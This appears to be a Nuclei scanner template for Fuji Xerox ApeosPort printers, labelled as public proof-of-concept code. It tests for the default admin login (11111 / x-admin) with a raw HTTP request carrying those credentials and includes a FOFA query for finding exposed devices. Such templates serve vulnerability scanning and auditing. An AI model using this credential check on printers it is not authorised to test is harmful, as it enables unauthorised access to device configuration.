This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.
PoC代码[已公开]
id: fuji-xerox-default-login
info:
name: Fuji Xerox ApeosPort - Default Login
author: Morgan Robertson
severity: high
description: |
This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.
reference:
- https://4it.com.au/kb/article/fuji-xerox-default-password/
classification:
cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fujixerox
product: apeosport-v_c3375
fofa-query: '"prop.htm" && "docucentre"'
tags: default-login,fuji,fuji-xerox,printer,vuln
http:
- raw:
- |
GET /prop.htm HTTP/1.1
Host: {{Hostname}}
Authorization: Basic MTExMTE6eC1hZG1pbg==
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Configuration Overview"
- "Description"
- "System Administrator Settings"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c2169b8d9d14410f518cdc073bb3655e0e70eff1d878d29ecab0886f1aa5027502210095e780859ce69c60303602b28103bc65164b9c5be8cfd48b63adcb1f2b4c9351:922c64590222798bb761d5b6d8e72950